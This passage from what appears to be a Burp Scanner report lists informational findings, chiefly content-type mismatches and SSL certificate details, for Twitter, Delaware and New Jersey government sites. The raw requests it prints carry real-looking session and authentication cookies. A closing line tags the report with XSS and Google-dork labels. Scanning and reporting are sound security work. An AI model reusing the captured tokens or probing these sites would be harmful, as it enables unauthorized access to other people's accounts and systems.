Content-Length: 5144
Server: AmazonS3
X-Amz-Cf-Id: 74d0d15abd880ecb8be4e08a5e15a884846a56706a19f143712971cbd63ff8733a0aec45c01c87c2,b17fa5615e3ee22eb4ad0c5aa1a33a126fc940d95115e9aafb741d19767f8ef77cfb8cd3ed0d5774
X-CDN: AKAM
Cache-Control: max-age=19966270
Expires: Wed, 29 Feb 2012 04:14:57 GMT
Date: Wed, 13 Jul 2011 02:03:47 GMT
Connection: close
Content-Type: image/jpeg
X-CDN: AKAM

.PNG
.
...IHDR...0...0.....W.......gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD............. pHYs...H...H.F.k>... vpAg...0...0....W...ZIDATh.....\.u.?wy[.Z....[.Cq.Q
...[SNIP]...

21.3. http://a2.twimg.com/profile_images/368371941/saveur_icon_normal.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a2.twimg.com
Path:	/profile_images/368371941/saveur_icon_normal.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/368371941/saveur_icon_normal.gif HTTP/1.1
Host: a2.twimg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/

Response

HTTP/1.1 200 OK
x-amz-id-2: ObMVyZsoDOvovUd1vEBHd81UPpQTGd6d0clyQHmJcOL0li6+lJ+lGir+1alJSmbg
x-amz-request-id: 5F25143B022884B0
Last-Modified: Tue, 18 Aug 2009 14:24:50 GMT
ETag: "47ac4e6e0fc1a7a1f51a0c8870af87ef"
Accept-Ranges: bytes
Content-Length: 1596
Server: AmazonS3
X-Amz-Cf-Id: 612d596e9cecd3d2688919e924034e8191e2d190ccedfe3ada20afb3b5192d81eeae0973b7fa707c,e56ce395d32220ba738de407ed46b66b79717c2b13b0a152e2ad39636e8afb93954abdff36d7be56
X-CDN: AKAM
Cache-Control: max-age=22629492
Expires: Sat, 31 Mar 2012 00:05:19 GMT
Date: Wed, 13 Jul 2011 02:07:07 GMT
Connection: close
Content-Type: image/gif
X-CDN: AKAM

.PNG
.
...IHDR...0...0......`n.... pHYs...H...H.F.k>... vpAg...0...0....W....IDATX...ML.[.............. T.. ...Y.....+].........n....7jb...Q. .DT.....P...a)m..t..b`.g.).....g6......{..{.....?...R
...[SNIP]...

21.4. http://a3.twimg.com/profile_images/497483711/MMlogo_normal.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a3.twimg.com
Path:	/profile_images/497483711/MMlogo_normal.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/497483711/MMlogo_normal.gif HTTP/1.1
Host: a3.twimg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/?q=cloudscan

Response

HTTP/1.1 200 OK
x-amz-id-2: YYgXU7WQhkkke+DbUca/UWXRiYPSrPhPlv0bi6ajN+lPUwr8LxhhEE5r35gA8RLQ
x-amz-request-id: CF181FCE11E3C7AD
Last-Modified: Thu, 29 Oct 2009 21:06:38 GMT
ETag: "e16b9eaadca4f78dbc543aa12b357c5b"
Accept-Ranges: bytes
Content-Length: 2652
Server: AmazonS3
X-Amz-Cf-Id: 11ede5880cfde437e1e7117285cca08cf37ff5d4486368baad0347f530125723956696fe643ece74,ed9616131f6f25a180e844c0f766206e52a87c1cc794c1b581519f8b2e32eafa1c69e56e15effdd1
X-CDN: AKAM
X-CDN: AKAM
X-CDN: AKAM
X-CDN: AKAM
X-CDN: AKAM
X-CDN: AKAM
X-CDN: AKAM
X-CDN: AKAM
Cache-Control: max-age=19771543
Expires: Sun, 26 Feb 2012 22:11:11 GMT
Date: Wed, 13 Jul 2011 02:05:28 GMT
Connection: close
Content-Type: image/gif
X-CDN: AKAM

.PNG
.
...IHDR...0...0......`n.... oFFs..........vek... pHYs...H...H.F.k>... vpAg...1...0..._... .IDATX..YMl\W......x<v..8.3I.6-mC..%(.!..P.
.*$.*;.b[.*..+..
.,...P.-..!..aQ...J...Il'u..g..y.....y?
...[SNIP]...

21.5. http://de.gov/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://de.gov
Path:	/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: de.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcspersistslider1=1

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 12 May 2011 12:50:29 GMT
ETag: "1b88120-37e-4a313a2454f40"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

21.6. https://egov.dnrec.delaware.gov/egovpublic/js/MenuItems.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://egov.dnrec.delaware.gov
Path:	/egovpublic/js/MenuItems.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

Response

21.7. https://hi.state.nj.us/DOBI_RELOLTRF/* previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://hi.state.nj.us
Path:	/DOBI_RELOLTRF/*

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /DOBI_RELOLTRF/* HTTP/1.1
Host: hi.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 13 Jul 2011 01:52:08 GMT
Server: IBM_HTTP_Server
$WSEP:
Content-Length: 41
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

Error 404: SRVE0190E: File not found: /*

21.8. https://maps-api-ssl.google.com/maps/api/js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://maps-api-ssl.google.com
Path:	/maps/api/js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.9. http://maps.google.com/maps/api/js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://maps.google.com
Path:	/maps/api/js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.10. https://portal01.state.nj.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://portal01.state.nj.us
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8KCHkif57us6GAU2YZ9vUrrHig0JMuag%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet

Response

HTTP/1.0 404 Not Found
Date: Tue, 12 Jul 2011 21:41:09 EDT
Pragma: no-cache
Server: sun.net
Allow: GET
Content-Length: 9
Content-Type: text/html;charset=ISO-8859-1
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9

Not Found

21.11. http://twitter.com/account/available_features previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://twitter.com
Path:	/account/available_features

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /account/available_features HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: js=1; guest_id=v1%3A130884465537011414; k=173.193.214.243.1310208653927867; external_referer=ZLhHHTiegr%2Foii8EN6JdFQWQUyflGgAMHTKQFsYyQk38yALXl3deMA%3D%3D%7C0; __utma=43838368.1598605414.1305368954.1310519089.1310522626.16; __utmb=43838368.1.10.1310522626; __utmc=43838368; __utmz=43838368.1310522626.16.9.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/cybersecurity/; __utmv=43838368.lang%3A%20en; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCGJMPCExAToHaWQiJWI5MzdjOTBmYTliMWUw%250AYzRmZjE4NDAwMmQ1NTY2Y2YxOgxjc3JmX2lkIiVhNDJkOWUzMjg5ZTdmMzc5%250ANWE0MDU1NGQxMjQyNDI3NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--202add13738553126a22c2c6453f33902aa93684

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:06:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310522810-89118-38541
ETag: "b39161cec15766fc41d8a7b5569f272f"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 02:06:50 GMT
X-Runtime: 0.01226
Content-Type: text/javascript; charset=utf-8
Content-Length: 3166
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 725e378c908b28207691e05e37bac9052b83646f
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
Connection: close

{"tweet_stream_retweets_by_others":1,"dashboard_activity_listed":1,"phoenix_tweetbox_talon":1,"tweet_stream_favorites_polling":1,"social_context":1,"tweet_stream_following":1,"phoenix_search_dropdown"
...[SNIP]...

21.12. http://www.bi2technologies.com/poormanscron/run-cron-check previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bi2technologies.com
Path:	/poormanscron/run-cron-check

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /poormanscron/run-cron-check HTTP/1.1
Host: www.bi2technologies.com
Proxy-Connection: keep-alive
Referer: http://www.bi2technologies.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS899ea88213388d656040b350d7b27e10=dt7ck8mdbqshmiherumn6jrb67; has_js=1

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:36:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-1
Last-Modified: Wed, 13 Jul 2011 11:36:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Sat, 09 Jul 2011 02:14:14 +0000
Content-Type: text/javascript; charset=utf-8
Content-Length: 21

{ "cron_run": false }

21.13. http://www.delaware.gov/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.delaware.gov
Path:	/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: www.delaware.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcspersistslider1=1; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522360152:ss=1310522357519

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:55:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 12 May 2011 12:50:29 GMT
ETag: "1380209-37e-4a313a2454f40"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

22. Content type is not specified previous next
There are 2 instances of this issue:

http://patft.uspto.gov/netacgi/nph-Parser
http://server.iad.liveperson.net/hc/33511087/

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

22.1. http://patft.uspto.gov/netacgi/nph-Parser previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://patft.uspto.gov
Path:	/netacgi/nph-Parser

Request

GET /netacgi/nph-Parser?Sect1=PTO2&Sect2=HITOFF&p=1&u=%2Fnetahtml%2FPTO%2Fsearch-bool.html&r=1&f=G&l=50&co1=AND&d=PTXT&s1=6344062.PN.&OS=PN/6344062=PN/6344062 HTTP/1.1
Host: patft.uspto.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

<HTML>
<HEAD>
<BASE TARGET="_top">
<TITLE>United States Patent: 6344062</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF">
<a name="top"></a>
<center>
<IMG SRC="/netaicon/PTO/patfthdr.gif" alt="[US Patent & Trademark Office, Patent Full Text and Image Database]">
<br>
<table>
<tr><td align=center>
<a href="http://www.uspto.gov/patft/index.html"><img src="/netaicon/PTO/home.gif" alt="[Home]" border="0" valign=middle></a>
<a href="/netahtml/PTO/search-bool.html"><img src="/netaicon/PTO/boolean.gif" alt="[Boolean Search]" border="0" valign=middle></a>
<A HREF="/netahtml/PTO/search-adv.htm"><IMG BORDER="0" SRC="/netaicon/PTO/manual.gif" ALT="[Manual Search]" valign=middle></A>
<a href="/netahtml/PTO/srchnum.htm"><img src="/netaicon/PTO/number.gif" alt="[Number Search]" border="0" valign=middle></a>
<A HREF="http://www.uspto.gov/patft/help/help.htm"><IMG BORDER="0" valign=middle SRC="/netaicon/PTO/help.gif" ALT="[Help]"></A>
</td></tr>
<tr><td align=center>
<a href="#bottom"><img src="/netaicon/PTO/bottom.gif" alt="[Bottom]" valign=middle border=0></A>
</td></tr>
<tr><td align=center>
<A HREF="http://ebiz1.uspto.gov/vision-service/ShoppingCart_P/ShowShoppingCart?backUrl1=http%3A//patft1.uspto.gov/netacgi/nph-Parser?Sect1%3DPTO2%26Sect2%3DHITOFF%26p%3D1%26u%3D%25252Fnetahtml%25252FPTO%25252Fsearch-bool.html%26r%3D1%26f%3DG%26l%3D50%26co1%3DAND%26d%3DPTXT%26s1%3D6344062.PN.%26OS%3DPN%2F6344062%3DPN%2F6344062&backLabel1=Back%20to%20Document%3A%206344062"><img border=0 src="/netaicon/PTO/cart.gif" border=0 valign=middle alt="
[View Shopping Cart]"></A>
<A HREF="http://ebiz1.uspto.gov/vision-service/ShoppingCart_P/AddToShoppingCart?docNumber=6344062&backUrl1=http%3A//patft1.uspto.gov/netacgi/nph-Parser?Sect1%3DPTO2%26Sect2%3DHITOFF%26p%3D1%26u%3D%25252Fnetahtml%25252FPTO%25252Fsearch-bool.html%26r%3D1%26f%3DG%26l%3D50%26co1%3DAND%26d%3DPTXT%26s1%3D6344062.PN.%26OS%3DPN%2F6344062%3DPN%2F6344062&backLabel1=Back%20to%20Document%3A%206344062">
<img border=0 src="/netaicon/PTO/order.gif" valign=middle alt="[Add to Shopping Cart]"></A>
</td></tr>
<tr><td align=center>
<a href=http://patimg2.uspto.gov/.piw?Docid=06344062&homeurl=http%3A%2F%2Fpatft.uspto.gov%2Fnetacgi%2Fnph-Parser%3FSect1%3DPTO2%2526Sect2%3DHITOFF%2526p%3D1%2526u%3D%25252Fnetahtml%25252FPTO%25252Fsearch-bool.html%2526r%3D1%2526f%3DG%2526l%3D50%2526co1%3DAND%2526d%3DPTXT%2526s1%3D6344062.PN.%2526OS%3DPN%2F6344062%3DPN%2F6344062%2526RS%3D&PageNum=&Rtype=&SectionNum=&idkey=NONE&Input=View+first+page><img src="/netaicon/PTO/image.gif" alt="[Image]" border="0" valign="middle"></A>

</td></tr>
</table>
</center>
<TABLE WIDTH="100%">
<TR><TD ALIGN="LEFT" width="50%"> </TD>
<TD ALIGN=RIGHT VALIGN=BOTTOM WIDTH=50%><FONT SIZE=-1>( <STRONG>1</STRONG></FONT> <FONT SIZE=-2>of</FONT
...[SNIP]...

22.2. http://server.iad.liveperson.net/hc/33511087/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/33511087/

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=inPage&page=http%3A//www.delaware.gov/apps/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=5808447995&scriptVersion=1.1&d=1310522401889&title=Delaware.gov%20--%20Mobile%20Apps%20for%20iPhone%20and%20Android&referrer=http%3A//www.delaware.gov/ HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.delaware.gov/apps/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5099524182751471388; LivePersonID=-16101514677756-1310522366:-1:-1:-1:-1; HumanClickSiteContainerID_33511087=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1310522363550

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:00:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_33511087=STANDALONE; path=/hc/33511087
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89a2............,...........L.;

23. SSL certificate previous
There are 2 instances of this issue:

https://portal01.state.nj.us/
https://wwwnet1.state.nj.us/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

23.1. https://portal01.state.nj.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	portal01.state.nj.us
Issued by:	VeriSign Class 3 Secure Server CA - G3
Valid from:	Thu May 12 19:00:00 CDT 2011
Valid to:	Fri May 18 18:59:59 CDT 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

23.2. https://wwwnet1.state.nj.us/ previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://wwwnet1.state.nj.us
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	wwwnet1.state.nj.us
Issued by:	VeriSign Class 3 Secure Server CA - G2
Valid from:	Sun Sep 26 19:00:00 CDT 2010
Valid to:	Fri Oct 21 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G2
Issued by:	VeriSign Trust Network
Valid from:	Tue Mar 24 19:00:00 CDT 2009
Valid to:	Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:	VeriSign Trust Network
Issued by:	VeriSign Trust Network
Valid from:	Sun May 17 19:00:00 CDT 1998
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Report generated by Burp Scanner at Wed Jul 13 06:55:20 CDT 2011.

XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07132011-01

Contents

Issue background

Remediation background

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Request

Response

Issue background

Issue remediation

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Issue background

Issue remediation

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response

Summary

Issue detail

Request

Response